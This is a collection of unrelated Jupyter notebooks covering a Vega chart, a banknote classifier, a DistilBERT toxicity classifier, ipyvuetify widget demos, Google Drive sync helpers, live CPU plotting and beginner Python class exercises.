chart = alt.Chart(url_data).mark_circle(
opacity=.5,
size=6
).transform_calculate(**rename_dict).encode(
alt.X(alt.repeat("column"), type='quantitative'),
alt.Y(alt.repeat("row"), type='quantitative')
).properties(
width=100,
height=100
).repeat(
row=['AvgTicketPrice', 'DistanceKilometers', 'FlightDelayMin', 'FlightTimeMin'],
column=['FlightTimeMin', 'FlightDelayMin', 'DistanceKilometers', 'AvgTicketPrice']
).interactive()
chart
from save_vega_vis import saveVegaVis
from elasticsearch import Elasticsearch
es=Elasticsearch([{'host':'localhost','port':9200}])
saveVegaVis(es, 'kibana_sample_data_flights', 'def-vega-splom-1', chart, resultSize=1000)
###Output
_____no_output_____ |
Banknote Authentication.ipynb | ###Markdown
Banknote authentication
###Code
# importing python data analysis toolkits
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import seaborn as sns
from mpl_toolkits.mplot3d import Axes3D
# reading the banknote data from the csv file and storing the result in a data frame
data = pd.read_csv("data_banknote_authentication.csv")
data.head(5)
###Output
_____no_output_____
###Markdown
Analyzing the data
###Code
data.info() # missing values not found
#number of instances (rows) that belong to each class. We can view this as an absolute count.
data['class'].value_counts()
###Output
_____no_output_____
###Markdown
Visualizing the Class Column
###Code
sns.heatmap(data.corr(), square=True, annot=True)
columns = [f for f in data.columns if data.dtypes[f] != 'object']
values = pd.melt(data, value_vars = columns)
hist = sns.FacetGrid (values, col='variable', col_wrap=4, sharex=False, sharey = False)
hist = hist.map(sns.distplot, 'value')
hist
###Output
_____no_output_____
###Markdown
Splitting data into training and testing
###Code
X5 = data.drop('class', axis=1)
X5.head()
y5 = data['class']
y5.head()
from sklearn.model_selection import train_test_split
X5_train, X5_test, y5_train, y5_test = train_test_split(X5, y5, test_size = 0.20)
print("Sample in traiing set:::", X5_train.shape)
print("Sample in testing set:::", X5_test.shape)
print("Sample of target in training set::", y5_train.shape)
print("Sample of target in testing set::", y5_test.shape)
# note: the original cell imported SGDOptimizer from sklearn's private
# _stochastic_optimizers module, which is not a classifier and cannot be fit
# on data; SGDClassifier (logistic loss trained with stochastic gradient
# descent) is used here instead, so that `pred5` below is defined
from sklearn.linear_model import SGDClassifier
gd = SGDClassifier(loss='log_loss', learning_rate='constant', eta0=0.1)
gd.fit(X5_train, y5_train)
pred5 = gd.predict(X5_test)
from sklearn.metrics import classification_report, confusion_matrix
print(confusion_matrix(y5_test,pred5.round()))
print(classification_report(y5_test,pred5.round()))
from sklearn.metrics import accuracy_score
accuracy5 = accuracy_score(y5_test, pred5.round())
print("Accuracy", accuracy5)
###Output
Accuracy 0.9890909090909091
|
civility/classifier/other_implementations/pytorch_custom.ipynb | ###Markdown
Dataset
###Code
from datasets import load_dataset
import random
import torch
from torch import nn
from torch.utils.data import DataLoader
from tqdm.auto import tqdm
from transformers import AdamW, DistilBertTokenizerFast, DistilBertForSequenceClassification, get_scheduler
tokenizer = DistilBertTokenizerFast.from_pretrained('distilbert-base-uncased')
dataset = load_dataset("civil_comments")
class CivilCommentsDataset(torch.utils.data.Dataset):
"""
Builds split instance of the `civil_comments` dataset: https://huggingface.co/datasets/civil_comments.
"""
def __init__(self, encodings, labels):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
item['labels'] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.labels)
def build_data_split(split, num_data_points):
print(f"Generating {num_data_points} data points for {split} split...", end="", flush=True)
civil_idx = []
uncivil_idx = []
num_civil = num_data_points / 2
num_uncivil = num_data_points / 2
for i, data in enumerate(dataset[split]):
if data["toxicity"] < 0.5 and num_civil > 0:
civil_idx.append(i)
num_civil -= 1
elif data["toxicity"] > 0.5 and num_uncivil > 0:
uncivil_idx.append(i)
num_uncivil -= 1
if num_civil == 0 and num_uncivil == 0:
break
indexes = civil_idx + uncivil_idx
random.shuffle(indexes)
encodings = tokenizer(dataset[split][indexes]["text"], truncation=True, padding=True)
labels = dataset[split][indexes]["toxicity"]
print("done")
return encodings, labels
encodings, labels = build_data_split("train", 500)
train_dataset = CivilCommentsDataset(encodings, labels)
encodings, labels = build_data_split("validation", 500)
val_dataset = CivilCommentsDataset(encodings, labels)
###Output
_____no_output_____
###Markdown
Model
###Code
model = DistilBertForSequenceClassification.from_pretrained(
'distilbert-base-uncased',
num_labels=1,
)
model.dropout.p = 0
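# note: add_module only registers the Sigmoid as a submodule; the pretrained
# model's forward pass never calls it, so the regression head output is not
# actually squashed to (0, 1) here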
model.add_module(module=nn.Sigmoid(), name="sigmoid")
for param in model.base_model.parameters():
param.requires_grad = False
train_data_loader = DataLoader(train_dataset, shuffle=True, batch_size=128)
eval_data_loader = DataLoader(val_dataset, batch_size=128)
optimizer = AdamW(model.parameters(), lr=1e-3)
num_epochs = 20
num_training_steps = num_epochs * len(train_data_loader)
lr_scheduler = get_scheduler(
"linear",
optimizer=optimizer,
num_warmup_steps=0,
num_training_steps=num_training_steps
)
device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
model.to(device)
progress_bar = tqdm(range(num_training_steps))
def eval_mod():
mse_mean = []
acc_mean = []
for batch in eval_data_loader:
batch = {k: v.to(device) for k, v in batch.items()}
with torch.no_grad():
outputs = model(**batch)
labels = batch["labels"]
outputs = outputs.logits
mse_mean.append(torch.mean(torch.square(outputs - labels)))
acc_mean.append(
torch.mean(torch.eq(outputs.transpose(0, 1) > 0.5, labels > 0.5).float())
)
return torch.mean(torch.stack(mse_mean)), torch.mean(torch.stack(acc_mean))
###Output
_____no_output_____
###Markdown
Main Program
###Code
for epoch in range(num_epochs):
losses = []
for batch in train_data_loader:
batch = {k: v.to(device) for k, v in batch.items()}
outputs = model(**batch)
loss = outputs.loss
losses.append(float(loss.data))
loss.backward()
optimizer.step()
lr_scheduler.step()
optimizer.zero_grad()
progress_bar.update(1)
mse_mean, accuracy_mean = eval_mod()
loss_mean = torch.mean(torch.tensor(losses))
print(f" After epoch {epoch} | Train Loss: {loss_mean:.2f}, Val MSE: {mse_mean:.2f}, Val Accuracy: {accuracy_mean:.2f}")
model.save_pretrained(f"./results/checkpoints/epoch-{epoch}")
model.save_pretrained("./results/final_model")
print("\nProgram complete")
###Output
_____no_output_____ |
2019-09-4-EuroSciPy-voila/why-ipyvuetify.ipynb | ###Markdown
Maarten Breddels

Motivation

Glue Jupyter
* Glue in the notebook
* Comes from Qt -> GUI

Challenges for ipywidgets
###Code
import glue_jupyter as gj
import ipywidgets
import ipywidgets as widgets
data = gj.example_data_xyz()
app = gj.jglue(data=data)
app.histogram1d();
###Output
_____no_output_____
###Markdown
Oliver Borderies - SocGen
* Olivier: I want to put widgets into modern component pages (Vue)
* Me: I want more of these React-based MaterialUI widgets
* Olivier: but Vue is better
* Me: but React is more popular
* Me & Olivier: let's autogen MaterialUI & Vuetify widgets
* Mario: I can make it!
* QuantStack project

Plan
* Wrap both: MaterialUI (React based) and Vuetify (Vue based)
* Both are Material Design component libraries
* All code is autogenerated: ipyvuetify, xvuetify? jlvuetify? jvuetify
* Enable modern Single Page Applications (SPA) with widget support
* With kernel (voila)
* Without kernel, plain html (nbconvert?)
* (for free it renders on mobile)

ipymaterialui
* `$ pip install ipymaterialui`
* Wraps MaterialUI: React based, Material Design
* ~15 widgets manually wrapped
* Mario is working on wrapping it all
* (future: ipyreact + cookiecutter/manual how to wrap new/existing React components)
###Code
import ipymaterialui as mui
text1 = "Jupyter"
text2 = "Jupyter Widgets"
text3 = "Material UI"
text4 = "React"
texts = [text1, text2, text3, text4]
# the baseclass is just a
chips = [mui.Chip(label=text) for text in texts]
chips_div = mui.Div(children=chips)
chips_div
# Nice looking lists, the 3rd acting like a button
list_items = [
mui.ListItem(children=[mui.ListItemText(primary=text1, secondary=text3)], divider=True),
mui.ListItem(children=[mui.ListItemText(primary=text2, secondary=text4)], divider=True),
mui.ListItem(children=[mui.ListItemText(primary=text3, secondary=text1)], divider=True, button=True),
mui.ListItem(children=[mui.ListItemText(primary=text4, secondary=text2)], divider=True)
]
mui.List(children=list_items)
# For the moment only list items can be used for popup menus
# This needs a more generic solution?
menuitems = [
mui.MenuItem(description=text1, value='1'),
mui.MenuItem(description=text2, value='2'),
mui.MenuItem(description=text3, value='3')
]
menu = mui.Menu(children=menuitems)
list_item_text = mui.ListItemText(primary=text4, secondary=text1, button=True)
list_item = mui.ListItem(children=[list_item_text], button=True, menu=menu)
list_item
###Output
_____no_output_____
###Markdown
Sure nice, but Olivier wants Vue(tify) Ipyvuetify * `$ pip install ipyvuetify` * QuantStack/SocGen project (Olivier Borderier) * Made by Mario Buikhuizen * Wraps Vuetify * Vue based * Material Design
###Code
import ipyvuetify as v
import ipywidgets as widgets
from threading import Timer
lorum_ipsum = 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'
v.Layout(children=[
v.Btn(color='primary', children=['primary']),
v.Btn(color='error', children=['error']),
v.Btn(color='pink lighten-4', children=['custom']),
v.Btn(color='#654321', dark=True, children=['hex']),
v.Btn(color='#654321', disabled=True, children=['disabled']),
])
v.Layout(children=[
v.Btn(color='primary', flat=True, children=['flat']),
v.Btn(color='primary', flat=True, disabled=True, children=['flat']),
v.Btn(color='primary', round=True, children=['round']),
v.Btn(color='primary', round=True, disabled=True, children=['round']),
v.Btn(color='primary', depressed=True, children=['depressed']),
v.Btn(color='primary', flat=True, icon=True, children=[v.Icon(children=['thumb_up'])]),
v.Btn(color='primary', outline=True, children=['outline']),
])
v.Layout(children=[
v.Btn(color='primary', small=True, children=['small']),
v.Btn(color='primary', children=['normal']),
v.Btn(color='primary', large=True, children=['large']),
v.Btn(color='primary', small=True, fab=True, children=[v.Icon(children=['edit'])]),
v.Btn(color='primary', fab=True, children=[v.Icon(children=['edit'])]),
v.Btn(color='primary', fab=True, large=True, children=[v.Icon(children=['edit'])]),
])
def toggleLoading():
button2.loading = not button2.loading
button2.disabled = button2.loading
def on_loader_click(*args):
toggleLoading()
Timer(2.0, toggleLoading).start()
button2 = v.Btn(loading=False, children=['loader'])
button2.on_event('click', on_loader_click)
v.Layout(children=[button2])
toggle_single = v.BtnToggle(v_model=2, class_='mr-3', children=[
v.Btn(flat=True, children=[v.Icon(children=['format_align_left'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_center'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_right'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_align_justify'])]),
])
toggle_multi = v.BtnToggle(v_model=[0,2], multiple=True, children=[
v.Btn(flat=True, children=[v.Icon(children=['format_bold'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_italic'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_underline'])]),
v.Btn(flat=True, children=[v.Icon(children=['format_color_fill'])]),
])
v.Layout(pa_1=True, children=[
toggle_single,
toggle_multi,
])
v.Layout(children=[
v.Btn(color='primary', children=[
v.Icon(left=True, children=['fingerprint']),
'Icon left'
]),
v.Btn(color='primary', children=[
'Icon right',
v.Icon(right=True, children=['fingerprint']),
]),
v.Tooltip(bottom=True, children=[
v.Btn(slot='activator', color='primary', children=[
'tooltip'
]),
'Insert tooltip text here'
])
])
def on_menu_click(widget, event, data):
if len(layout.children) == 1:
layout.children = layout.children + [info]
info.children=[f'Item {items.index(widget)+1} clicked']
items = [v.ListTile(children=[
v.ListTileTitle(children=[
f'Click me {i}'])])
for i in range(1, 5)]
for item in items:
item.on_event('click', on_menu_click)
menu = v.Menu(offset_y=True, children=[
v.Btn(slot='activator', color='primary', children=[
'menu',
v.Icon(right=True, children=[
'arrow_drop_down'
])
]),
v.List(children=items)
])
info = v.Chip()
layout = v.Layout(children=[
menu
])
layout
v.Dialog(v_model=False, width='500', children=[
v.Btn(slot="activator", color='success', dark=True, children=[
"Open dialog"
]),
v.Card(children=[
v.CardTitle(class_='headline gray lighten-2', primary_title=True, children=[
"Lorem ipsum"]),
v.CardText(children=[
lorum_ipsum])
])
])
slider = v.Slider(v_model=25)
slider2 = v.Slider(thumb_label=True, v_model=25)
slider3 = v.Slider(thumb_label='always', v_model=25)
widgets.jslink((slider, 'v_model'), (slider2, 'v_model'))
widgets.jslink((slider, 'v_model'), (slider3, 'v_model'))
v.Container(children=[
slider,
slider2,
slider3
])
select1=v.Select(label="Choose option", items=['Option a', 'Option b', 'Option c'])
v.Layout(children=[select1])
tab_list = [v.Tab(children=[f'Tab {i}']) for i in range(1,4)]
content_list = [v.TabItem(children=[lorum_ipsum]) for i in range(1,4)]
tabs = v.Tabs(
v_model=1,
children=tab_list + content_list)
tabs
vepc1 = v.ExpansionPanelContent(children=[
v.Html(tag='div', slot='header', children=['item1']),
v.Card(children=[
v.CardText(children=['First Text'])])])
vepc2 = v.ExpansionPanelContent(children=[
v.Html(tag='div', slot='header', children=['item2']),
v.Card(children=[
v.CardText(children=['Second Text'])])])
vep = v.ExpansionPanel(children=[vepc1, vepc2])
vl = v.Layout(children=[vep])
vl
import ipyvuetify as v
from traitlets import (Unicode, List, Bool, Any)
class MyApp(v.VuetifyTemplate):
dark = Bool(True).tag(sync=True)
drawers = Any(['Default (no property)', 'Permanent', 'Temporary']).tag(sync=True)
model = Any(None).tag(sync=True)
type = Unicode('default (no property)').tag(sync=True)
clipped = Bool(False).tag(sync=True)
floating = Bool(True).tag(sync=True)
mini = Bool(False).tag(sync=True)
inset = Bool(False).tag(sync=True)
template = Unicode('''
<template>
<v-app id="sandbox" :dark="dark">
<v-navigation-drawer
v-model="model"
:permanent="type === 'permanent'"
:temporary="type === 'temporary'"
:clipped="clipped"
:floating="floating"
:mini-variant="mini"
absolute
overflow
app
>
</v-navigation-drawer>
<v-toolbar :clipped-left="clipped" app absolute>
<v-toolbar-side-icon
v-if="type !== 'permanent'"
@click.stop="model = !model"
></v-toolbar-side-icon>
<v-toolbar-title>Vuetify</v-toolbar-title>
</v-toolbar>
<v-content>
<v-container fluid>
<v-layout align-center justify-center>
<v-flex xs10>
<v-card>
<v-card-text>
<v-layout row wrap>
<v-flex xs12 md6>
<span>Scheme</span>
<v-switch v-model="dark" primary label="Dark"></v-switch>
</v-flex>
<v-flex xs12 md6>
<span>Drawer</span>
<v-radio-group v-model="type" column>
<v-radio
v-for="drawer in drawers"
:key="drawer"
:label="drawer"
:value="drawer.toLowerCase()"
primary
></v-radio>
</v-radio-group>
<v-switch v-model="clipped" label="Clipped" primary></v-switch>
<v-switch v-model="floating" label="Floating" primary></v-switch>
<v-switch v-model="mini" label="Mini" primary></v-switch>
</v-flex>
<v-flex xs12 md6>
<span>Footer</span>
<v-switch v-model="inset" label="Inset" primary></v-switch>
</v-flex>
</v-layout>
</v-card-text>
<v-card-actions>
<v-spacer></v-spacer>
<v-btn flat>Cancel</v-btn>
<v-btn flat color="primary">Submit</v-btn>
</v-card-actions>
</v-card>
</v-flex>
</v-layout>
</v-container>
</v-content>
<v-footer :inset="inset" app>
<span class="px-3">© {{ new Date().getFullYear() }}</span>
</v-footer>
</v-app>
</template>''').tag(sync=True)
def vue_menu_click(self, data):
self.color = self.items[data]
self.button_text = self.items[data]
app = MyApp()
app
app.inset = True
app.dark = True
app.type = 'permanent'
###Output
_____no_output_____
###Markdown
core ipywidgets vs ipyvuetify
* Composability vs verbosity
###Code
options = ['pepperoni', 'pineapple', 'anchovies']
v.RadioGroup(children=[v.Radio(label=k, value=k) for k in options], v_model=options[0])
widgets.RadioButtons(options=options, value=options[0], description='Pizza topping:')
v.Btn(color='primary', children=[
v.Icon(left=True, children=['fingerprint']),
'Icon left'
])
widgets.Button(color='primary', description='icon left', icon='home')
menu = v.Menu(offset_y=True, children=[
v.Btn(slot='activator', color='primary', children=[
'menu',
        v.Icon(right=True, children=[
'arrow_drop_down'
])
]),
v.List(children=items)
])
menu
###Output
_____no_output_____ |
util_nbs/00b_data_manage.DLMusic_Data.ipynb | ###Markdown
Repo Management

While I don't want to track large data files with git (some I'd also like to keep private), I still want to make use of the cloud to store my files in case something happens to my local machine. Thus, here I outline the ability to shuttle files between my Google Drive and this repo (a first-build solution; we'll see if it lasts).

Accessing Google Drive

Using pydrive https://pythonhosted.org/PyDrive/quickstart.html, I came up with the following code.

General utils and conventions

You need to go to Google's API Console (see link above), download the `client_secrets.json`, and put it in this directory (perhaps also in the ml module directory). I think this only needs to be done once.

Prepping connection
###Code
#export
gauth = GoogleAuth()
drive = GoogleDrive(gauth)
gauth.LocalWebserverAuth() # Creates local webserver and auto handles authentication.
###Output
Your browser has been opened to visit:
https://accounts.google.com/o/oauth2/auth?client_id=884310440114-oqhbrdkc3vikjmr3nvnrkb0ptr7lvp8r.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8080%2F&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fdrive&access_type=offline&response_type=code
Authentication successful.
###Markdown
Encoding Google file types

These are super long and not always intuitive, so I'll store them in a dict that makes them more readable.
###Code
# export
gtypes = {
'folder' : 'application/vnd.google-apps.folder'
}
gtypes['folder']
###Output
_____no_output_____
###Markdown
Grabbing root id
###Code
# export
def get_root_remote_id(folderName = 'ml_repo_data', gtypes=gtypes):
# query google drive
folders = drive.ListFile(
{'q': f"title='{folderName}' and mimeType='{gtypes['folder']}' and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
root_id = get_root_remote_id()
root_id[:5] # not going to print all 33 chars
###Output
_____no_output_____
###Markdown
Grabbing folder id

The argument is the id of the item above it in the tree (the `parent` id).
###Code
# export
def get_folder_id(parent_id, foldername):
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations/coloration
folders = drive.ListFile(
{'q': f"title='{foldername}' and mimeType='{ftype}' and '{parent_id}' in parents and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
DLM_id = get_folder_id(parent_id = root_id, foldername = 'DL_music')
DLM_id[:5] # not going to print all 33 chars
###Output
_____no_output_____
###Markdown
Grabbing folder contents
###Code
# export
def grab_folder_contents(parent_id):
'''Return a list of all the items in a folder based on its parent id'''
file_list = drive.ListFile({'q': f"'{parent_id}' in parents and trashed=false"}).GetList()
return file_list
file_list = grab_folder_contents(DLM_id)
# it returns a list
file = file_list[1]
# each file is a dictionary of information
file.keys()
###Output
_____no_output_____
###Markdown
check if file exists remote by name and parent
###Code
# export
def check_file_exists_remote(parent_id, fname):
file_list = grab_folder_contents(parent_id)
for file in file_list:
if file['title'] == fname : return True
continue
return False
parent_id = file['parents'][0]['id']
fname = file['title']
check_file_exists_remote(parent_id, fname)
###Output
_____no_output_____
###Markdown
Grabbing file id
###Code
# export
def get_file_id(parent_id, fname):
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations/coloration
file_list = drive.ListFile(
{'q': f"title='{fname}' and '{parent_id}' in parents and trashed=false"}).GetList()
file = file_list[0] # the above returns a list
return file['id']
file_id = get_file_id(parent_id, fname)
file_id[:5]
###Output
_____no_output_____
###Markdown
Downloading files

Everything draws from pydrive's "file" object, which can be initiated with the file's remote id. Downloading it from there is simple:
###Code
# export
def download_file(file_id, local_dpath = None):
    # Create a GoogleDriveFile instance with the given file id (the original
    # used an undefined `item` here instead of the parameter).
    file = drive.CreateFile({'id': file_id})
    local_dpath = './' if local_dpath is None else local_dpath
    local_fpath = local_dpath + file['title']
    file.GetContentFile(local_fpath)
    return local_fpath
local_dpath = 'data/DeepLearn_Music/'
file_id = file['id']  # `file` comes from the folder listing above
local_fpath = download_file(file_id, local_dpath)
local_fpath
###Output
_____no_output_____
###Markdown
uploading new file
###Code
# export
def upload_new_file(local_fpath, fname, parent_id):
file = drive.CreateFile({'parents': [{'id': f'{parent_id}'}]})
file['title'] = fname
file.SetContentFile(local_fpath)
file.Upload()
return
upload_new_file(local_fpath, file['title'], file['parents'][0]['id'])
###Output
GoogleDriveFile({'parents': [{'id': '1QbKZKPxfPPnLzxL6NcLmZO0mOmzm_wCL'}]})
###Markdown
updating existing file
###Code
# export
def update_existing_file(local_fpath, file_id):
    file = drive.CreateFile({'id': file_id})
file.SetContentFile(local_fpath)
file.Upload()
return
update_existing_file(local_fpath, file['id'])
###Output
_____no_output_____
###Markdown
Sync a file to remoteRegardless of it exists or not (it will check)
###Code
# export
def sync_file_to_remote(local_fpath, fname, parent_id):
'''will check if file exists remote first then will upload/update
accordingly'''
file_exists_remote = check_file_exists_remote(parent_id, fname)
# update if its already there
if file_exists_remote:
file_id = get_file_id(parent_id, fname)
update_existing_file(local_fpath, file_id)
# upload a new one else
else:
upload_new_file(local_fpath, fname, parent_id)
return
sync_file_to_remote(local_fpath, file['title'], file['parents'][0]['id'])
###Output
_____no_output_____
###Markdown
DeepLearn_music Utils

Using some of the utils above, but defining the tree structure here
###Code
class DeepLearnMusic_Syncer():
def __init__(self):
self.DLM_folderName = 'DL_music'
self.DLM_id = self.get_DLM_remote_id()
return
def get_DLM_remote_id(self):
# get the root_id in the drive
root_id = get_root_remote_id()
# grab the folder
ftype = gtypes['folder'] # unfortunately if I don't do this Jupyter freaks out with indentations
folders = drive.ListFile(
{'q': f"title='{self.DLM_folderName}' and mimeType='{ftype}' and '{root_id}' in parents and trashed=false"}).GetList()
folder = folders[0] # the above returns a list
return folder['id']
a = DeepLearnMusic_Syncer()
a.DLM_id
file_list = drive.ListFile({'q': "'1zAxvLd2KQiOcZXma3nMaeUehQ_JiSJFy' in parents and trashed=false"}).GetList()
for file in file_list:
print('Title: %s, ID: %s' % (file['title'], file['id']))
# Get the folder ID that you want
if(file['title'] == "To Share"):
fileID = file['id']
def grab_file_ids(parent_id):
file_list = drive.ListFile({'q': f"'{parent_id}' in parents and trashed=false"}).GetList()
ids = {}
for file in file_list:
ids[file['title']] = file['id']
return ids
grab_file_ids(a.DLM_id)
###Output
_____no_output_____
###Markdown
Tutorial
###Code
# this will prompt you to log in to google
import ml.repo_management.drive as drive
root_id = drive.get_root_remote_id()

# list the contents of a folder by its id and grab the id of the one we want
# (the query's `parents` clause needs a folder id, not a title; grab_folder_contents
# is assumed to be exported to this module along with the other helpers above)
file_list = drive.grab_folder_contents(root_id)
for file in file_list:
    print('Title: %s, ID: %s' % (file['title'], file['id']))
    # Get the folder ID that you want
    if file['title'] == "To Share":
        fileID = file['id']
fileID
###Output
_____no_output_____ |
notebook/Unit2-B-Live_Plotting.ipynb | ###Markdown
Live Updating Plots
In our work, we are often required to **plot live** data.

* **psutil**: cross-platform lib for process and system monitoring in Python: https://github.com/giampaolo/psutil

```text
python -m pip install psutil
```

1 Python Script

* ```matplotlib.pyplot.ion()``` turns the **interactive** mode on: https://matplotlib.org/api/_as_gen/matplotlib.pyplot.ion.html?highlight=ion
* ```matplotlib.pyplot.clf()``` clears the current figure: https://matplotlib.org/api/_as_gen/matplotlib.pyplot.clf.html
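As a minimal sketch of the redraw pattern the script below uses (the same `psutil` + `ion`/`clf`/`pause` pieces, stripped of the file logging):

```python
import psutil
import matplotlib.pyplot as plt

plt.ion()                      # interactive mode: draw without blocking
ys = []
for _ in range(20):            # a short demo loop
    ys.append(psutil.cpu_percent())
    plt.clf()                  # clear the current figure
    plt.plot(ys, "b-o")
    plt.pause(0.5)             # let the GUI event loop redraw
```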
###Code
%%file ./code/python/cpu_monitor.py
import psutil
from time import sleep, strftime
import matplotlib.pyplot as plt
pltLength = 100
#Turn the interactive mode on.
plt.ion()
# index
x = [i for i in range(pltLength)]
# value
y = [None for i in range(pltLength)]
i = 0
def write_cpu(cpu):
with open("./data/cpu.csv", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"), str(cpu)))
def graph(cpu):
global i
if i < pltLength:
y[i] = cpu
i += 1
else:
# Once enough data is captured, append the newest data point and delete the oldest
y.append(cpu)
del y[0]
# clear the current figure.
plt.clf()
plt.xlim(0, pltLength)
plt.plot(x, y, "b-o")
plt.draw()
plt.pause(0.1)
while True:
cpu = psutil.cpu_percent()
write_cpu(cpu)
graph(cpu)
sleep(1)
###Output
_____no_output_____
###Markdown
2 Jupyter Notebook: Dynamic Plotting with `%matplotlib notebook`

* `%matplotlib notebook` leads to `interactive plots` embedded within the notebook
###Code
%matplotlib notebook
import matplotlib.pyplot as plt
import numpy as np
from time import sleep, strftime
import psutil
fig = plt.figure(figsize=(7,3))
plt.ion()
fig.show()
fig.canvas.draw()
pltLength=20
x = [i for i in range(pltLength)]
y = [None for i in range(pltLength)]
i = 0
def write_cpu(cpu):
with open("./data/cpu.csv", "a") as log:
log.write("{0},{1}\n".format(strftime("%Y-%m-%d %H:%M:%S"), str(cpu)))
def graph(cpu):
global i
if i < pltLength:
y[i] = cpu
i += 1
else:
# Once enough data is captured, append the newest data point and delete the oldest
y.append(cpu)
del y[0]
plt.clf()
plt.xlim(0, pltLength)
plt.plot(x, y, "b-o")
plt.show()
fig.canvas.draw() # draw
while True:
cpu = psutil.cpu_percent()
write_cpu(cpu)
graph(cpu)
sleep(1)
###Output
_____no_output_____ |
python01.ipynb | ###Markdown
1. Encapsulation: group related functionality together. 2. Inheritance: the main page provides one interface, and sub-pages inherit from it. 3. In Python, a colon must be followed by a block indented by one tab. 4. In Python, every function has a return value; if no `return` is given, `None` is returned by default, otherwise the given value is returned. 5. Import a library with `import` + library name. 6. For counting loops, use `range(start, end, [step])`; the range is a half-open interval -- `start` is included, `end` is excluded.
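For instance (a small illustration of point 6):

```python
list(range(1, 5))      # [1, 2, 3, 4] -- 5 is excluded
list(range(0, 10, 2))  # [0, 2, 4, 6, 8]
```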
###Code
a='rrr'
print(a)
#return the square of the input number
def su(x):
return x**2
print(su(343530))
#progress bar
import time
def s():
for i in range(1,101):
        #sleep for one second
        time.sleep(1)
        #formatted output with %: %d for integers, %f for floats, %s for strings
        #{} with format() accepts any type and formats it
        # \r moves the cursor back to the start of the line
        #print options: 1. end -- line terminator, default "\n"; 2. flush -- flush the output buffer
        print('%s%d%%\r'%('#'*i,i),end="",flush=True)
s()
#add, subtract, multiply and divide two parameters
class a(object):
    #def __init__(self) initializes the instance itself
def __init__(self,m,n):
        #separate multiple printed values with commas
print(m-n,m+n,m*n,m/n)
a(4,3)
#passing arguments
class student(object):
def __init__(self,name):
print(name)
student(100)
#given an age: 18 and over may watch romance films, under 18 only cartoons
class p(object):
def __init__(self,age):
if age>=18:
print("可看爱情片")
else:
print("看动画片")
p(17)
#given an age: over 20 and up to 50 may watch, 18-20 should study, under 18 cartoons, over 50 should not watch
class x(object):
def __init__(self,age):
if 18<=age<=20 :
print("看书")
elif 20<age<=50:
print("ok")
elif age<18:
print("dhp")
else:
print("no")
x(51)
#shared attribute
class Name(object):
def __init__(self,num):
self.a=num
def func1(self):
print(self.a)
def func2(self):
print('hello')
name=Name(100)
name.func1()
name.func2()
#classify age and gender
class l(object):
def __init__(self,age,gener):
self.age=age
self.gener=gener
def Age(self):
if self.age<=18:
print("青年")
elif 18<self.age<=40:
print("中年")
else:
print("老年")
def Gener(self):
if self.gener==0:
print("性别男")
elif self.gener==1:
print("性别女")
else:
print("无法识别")
L=l(7,1)
L.Age()
L.Gener()
class A(object):
def __init__(self,a):
self.a=a
def B(self,b):
self.b=b
print(b)
def c(self):
print(self.b)
w=A(2)
w.B(1)
w.c()
#check whether a number is prime
class Name(object):
def __init__(self,num):
self.num=num
def Check(self):
        #checking logic
        for i in range(2,self.num):
            if self.num % i==0:
                print('not prime')
                break
        else:  #for-else: runs only if no divisor was found
            print('prime')
name=Name(6)
name.Check()
#random choice
import numpy as np
res =np.random.choice(['Dian Wei','Zhao Yun','Lu Ban'])
print(res)
###Output
_____no_output_____
###Markdown
Homework: Honor of Kings exercise
###Code
import time
import numpy as np
class wz(object):
def __init__(self,entry):
self.entry=entry
    def jm(self):
        self.entry= input('Battle mode: vs. AI or multiplayer')
        print(self.entry)
    def rw(self):
        figure= input('Choose a hero: Dian Wei, Zhao Yun, Lu Ban')
        if figure== 'Dian Wei':
            print(figure,": attack--1500, defense--1647")
        elif figure == 'Zhao Yun':
            print(figure,": attack--1700, defense--1541")
        else:
            print(figure,": attack--253, defense--876")
    def sj(self):
        res =np.random.choice(['Dian Wei','Zhao Yun','Lu Ban'])
        if res== 'Dian Wei':
            print(res,": attack--1500, defense--1647")
        elif res == 'Zhao Yun':
            print(res,": attack--1700, defense--1541")
        else:
            print(res,": attack--253, defense--876")
    def start(self):
        b=input("Type start to begin")
        print('Loading.......')
    def s(self):
        for i in range(1,3):
            time.sleep(1)
            print('%s%d%%\r'%('#'*i,i),end="",flush=True)
WZ=wz('vs. AI')
WZ.jm()
WZ.rw()
WZ.sj()
WZ.start()
WZ.s()
print('Loading failed -- not worth playing, go study instead')
###Output
Battle mode: vs. AI or multiplayer e
e
Choose a hero: Dian Wei, Zhao Yun, Lu Ban e
e : attack--253, defense--876
Zhao Yun : attack--1700, defense--1541
Type start to begin e
Loading.......
Loading failed -- not worth playing, go study instead
###Markdown
Problem 1 (math: pentagonal numbers). A pentagonal number is defined as n(3n-1)/2. Write a test program that uses this function to display the first 100 pentagonal numbers, 10 per line. For example, n = 3 gives 3*(3*3-1)/2 = 12.
###Code
def getPentagona1Number(n):
c=int(n*(3*n-1)/2)
    print(c,end="\t")#\t is the tab character
if n % 10==0:
print()
for i in range(1,101):
getPentagona1Number(i)
###Output
1 5 12 22 35 51 70 92 117 145
176 210 247 287 330 376 425 477 532 590
651 715 782 852 925 1001 1080 1162 1247 1335
1426 1520 1617 1717 1820 1926 2035 2147 2262 2380
